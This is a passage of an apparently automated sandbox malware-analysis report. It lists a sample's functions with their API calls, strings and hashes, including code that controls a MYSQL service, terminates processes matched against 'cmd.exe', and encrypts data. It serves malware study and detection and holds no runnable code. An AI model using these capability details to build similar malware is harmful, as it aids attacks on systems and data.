                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                        • String ID: MYSQL
                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                        • Opcode ID: 65a31f0938bae61edc0c8cc127f710c52626895bb46b4a528d2f8d97f56fbca8
                                                                                                        • Instruction ID: 84d0f8eb0285abbd4b6004bdf5642096b77112790c37deaeaad37625a7d4e493
                                                                                                        • Opcode Fuzzy Hash: 65a31f0938bae61edc0c8cc127f710c52626895bb46b4a528d2f8d97f56fbca8
                                                                                                        • Instruction Fuzzy Hash: 77115135A4120DABDB209B959D49FEF7FACEF45761F050110FB04E3140DB28D985AAE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F4F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::exception::exception.LIBCMT ref: 00F4F27F
                                                                                                          • Part of subcall function 00F30CFC: std::exception::_Copy_str.LIBCMT ref: 00F30D15
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F4F294
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        • std::exception::exception.LIBCMT ref: 00F4F2AD
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F4F2C2
                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00F4F2D4
                                                                                                          • Part of subcall function 00F4EF74: std::exception::exception.LIBCMT ref: 00F4EF8E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F4F2E2
                                                                                                        • std::exception::exception.LIBCMT ref: 00F4F2FB
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F4F310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                        • String ID: bad function call
                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                        • Opcode ID: 53da069f17c67bb7a9c2a217e9922f45895e9a9f048c54b411d4ed12c866ee80
                                                                                                        • Instruction ID: 26943ac4e9e0c73b36b5170e1a2b70aa56c20a22ea91561e4ed4f60e24444b6b
                                                                                                        • Opcode Fuzzy Hash: 53da069f17c67bb7a9c2a217e9922f45895e9a9f048c54b411d4ed12c866ee80
                                                                                                        • Instruction Fuzzy Hash: 4111D774D0020DBBCB00FFA5D996CDEBBBCEA04344F448567BD2497242EB78A7499B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F23576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F235B1
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F2364A
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F23680
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F2369D
                                                                                                        • __allrem.LIBCMT ref: 00F236F3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F2370F
                                                                                                        • __allrem.LIBCMT ref: 00F23726
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F23744
                                                                                                        • __allrem.LIBCMT ref: 00F2375B
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F23779
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503770280-0
                                                                                                        • Opcode ID: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                        • Instruction ID: f155fbcd16921117b21cd176537e52adfa68d5b0c25ca6b451d659eedbb3ccd9
                                                                                                        • Opcode Fuzzy Hash: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                        • Instruction Fuzzy Hash: 6B71CBF2E00727ABD7149E79DC42B5AB3B8AF50734F14423AF514D7681E778DA40A790
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F65480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00F654C8
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F654D4
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00F654F7
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F65503
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00F65531
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00F6555B
                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00F655F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                        • Opcode ID: 7e2ecf9ed7d3ca3afe55606acc7b34aede3e4ffff278d03e15ca079eeae175fc
                                                                                                        • Instruction ID: d3b70f774cac12ec42987871fee35968fac65d3c3251f9320190a278185941cb
                                                                                                        • Opcode Fuzzy Hash: 7e2ecf9ed7d3ca3afe55606acc7b34aede3e4ffff278d03e15ca079eeae175fc
                                                                                                        • Instruction Fuzzy Hash: ED514C71E80718BBEB206B64DC07FBE7769AF05F20F040025FE06BB1C1D6655D05A6A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F12440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F1244F
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F12469
                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F124A1
                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00F124B0
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F124B7
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F124C1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F124CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                        • String ID: cmd.exe
                                                                                                        • API String ID: 2696918072-723907552
                                                                                                        • Opcode ID: 3d2d84c760bdbbc84d76742b5b86cede216c5f514f54607fd500a9036b74f7c9
                                                                                                        • Instruction ID: d8c199f8f07a0d4d562dbb2dd891f95ac73872b36d059c619b417476b02636b1
                                                                                                        • Opcode Fuzzy Hash: 3d2d84c760bdbbc84d76742b5b86cede216c5f514f54607fd500a9036b74f7c9
                                                                                                        • Instruction Fuzzy Hash: 470192369012197BE721ABE1AD8AFAE776CDB48B54F040051FD08D2142E6648940AAE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00F0F338
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F0F353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                        • Opcode ID: 26ad6378daf37ec2ae9fa65c29c302721bd1c7dd4632db1669a51a16b53d8a6e
                                                                                                        • Instruction ID: 5bfda25f19f615e696dd519c6acc2edcf3cde9a5d182d5ba2bd4239be15161c5
                                                                                                        • Opcode Fuzzy Hash: 26ad6378daf37ec2ae9fa65c29c302721bd1c7dd4632db1669a51a16b53d8a6e
                                                                                                        • Instruction Fuzzy Hash: 50C16D71D01209EBDF10DFA4DD86BDEBBB5BF14308F144029E405B7190EB7AAA58EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                        • Opcode ID: 24a1bcd992400dd68933eb05d30f4d7fb5bc73ff2780b8d016e484546c74e24a
                                                                                                        • Instruction ID: 3e4a3df81ca3ea9521d5393ad408b089c8bf3a2ba48a5dda5a5d6cc31924b773
                                                                                                        • Opcode Fuzzy Hash: 24a1bcd992400dd68933eb05d30f4d7fb5bc73ff2780b8d016e484546c74e24a
                                                                                                        • Instruction Fuzzy Hash: E8A183B1C00249DBEF11EFA4DC46BDEBB75AF10314F144128E50577292E7BA5688EBE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F63350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                        • API String ID: 909875538-2908105608
                                                                                                        • Opcode ID: 8cb7feb1a470375b60a0285218d6b91cd90e1f97b866cba460d2779a00f88a54
                                                                                                        • Instruction ID: 08f95d8e7b7842382a9ae32dc9bb1e2b7161d1bc368ae7b082ac91dc5f82734e
                                                                                                        • Opcode Fuzzy Hash: 8cb7feb1a470375b60a0285218d6b91cd90e1f97b866cba460d2779a00f88a54
                                                                                                        • Instruction Fuzzy Hash: E2414F65FC839129F731A52ABC03F96B7855B51B31F080425FB88E91C3FB95C947B192
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F25141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __init_pointers.LIBCMT ref: 00F25141
                                                                                                          • Part of subcall function 00F27D6C: EncodePointer.KERNEL32(00000000,?,00F25146,00F23FFE,01007990,00000014), ref: 00F27D6F
                                                                                                          • Part of subcall function 00F27D6C: __initp_misc_winsig.LIBCMT ref: 00F27D8A
                                                                                                          • Part of subcall function 00F27D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F326B3
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F326C7
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F326DA
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F326ED
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F32700
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F32713
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F32726
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F32739
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F3274C
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F3275F
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F32772
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F32785
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F32798
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F327AB
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F327BE
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F327D1
                                                                                                        • __mtinitlocks.LIBCMT ref: 00F25146
                                                                                                        • __mtterm.LIBCMT ref: 00F2514F
                                                                                                          • Part of subcall function 00F251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F25154,00F23FFE,01007990,00000014), ref: 00F28B62
                                                                                                          • Part of subcall function 00F251B7: _free.LIBCMT ref: 00F28B69
                                                                                                          • Part of subcall function 00F251B7: DeleteCriticalSection.KERNEL32(0100AC00,?,?,00F25154,00F23FFE,01007990,00000014), ref: 00F28B8B
                                                                                                        • __calloc_crt.LIBCMT ref: 00F25174
                                                                                                        • __initptd.LIBCMT ref: 00F25196
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F2519D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3567560977-0
                                                                                                        • Opcode ID: 6dcbade93e4d1aa63e4c339fc4a9b10d26f71f11ae3c1d1eb86c0de1724c66b5
                                                                                                        • Instruction ID: 3b6379e674f8e81896de5c6da88ab48701dcb51a6ecc2366f65221da9794ac39
                                                                                                        • Opcode Fuzzy Hash: 6dcbade93e4d1aa63e4c339fc4a9b10d26f71f11ae3c1d1eb86c0de1724c66b5
                                                                                                        • Instruction Fuzzy Hash: 78F0243294AB711EF27577B47C03B8A36C09F00B30F21061AF0A4CA1C6FF3884027290
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F2594A
                                                                                                          • Part of subcall function 00F28AF7: __mtinitlocknum.LIBCMT ref: 00F28B09
                                                                                                          • Part of subcall function 00F28AF7: __amsg_exit.LIBCMT ref: 00F28B15
                                                                                                          • Part of subcall function 00F28AF7: EnterCriticalSection.KERNEL32(00000000,?,00F27E21,00000008,01007B08,0000001C,00F27CFB,?,00000001,00000000,?,00F27C49,000000FF,?,00F2501A,00000010), ref: 00F28B22
                                                                                                        • _free.LIBCMT ref: 00F25970
                                                                                                          • Part of subcall function 00F20BED: HeapFree.KERNEL32(00000000,00000000,?,00F2507F,00000000,00F2500D,?,00F23F7C,?,00F1E6CC,00000000), ref: 00F20C01
                                                                                                          • Part of subcall function 00F20BED: GetLastError.KERNEL32(00000000,?,00F2507F,00000000,00F2500D,?,00F23F7C,?,00F1E6CC,00000000,?,?,?,?,?,00FCB3EC), ref: 00F20C13
                                                                                                        • __lock.LIBCMT ref: 00F25989
                                                                                                        • ___removelocaleref.LIBCMT ref: 00F25998
                                                                                                        • ___freetlocinfo.LIBCMT ref: 00F259B1
                                                                                                        • _free.LIBCMT ref: 00F259C4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 626533743-0
                                                                                                        • Opcode ID: 0837f769811d51025a06643ecf56be3196cf9d1f8af9e4d795d0278a795f4f16
                                                                                                        • Instruction ID: d6fb1ec8a830d6949e4c3c761d12a9c2a93a84983a8aeb719c9978909d9709d2
                                                                                                        • Opcode Fuzzy Hash: 0837f769811d51025a06643ecf56be3196cf9d1f8af9e4d795d0278a795f4f16
                                                                                                        • Instruction Fuzzy Hash: 62018431903B24E6EA35AB68FC46B1D73A0AF50B71F24424EF0A4560D5CF7D99C1BA51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
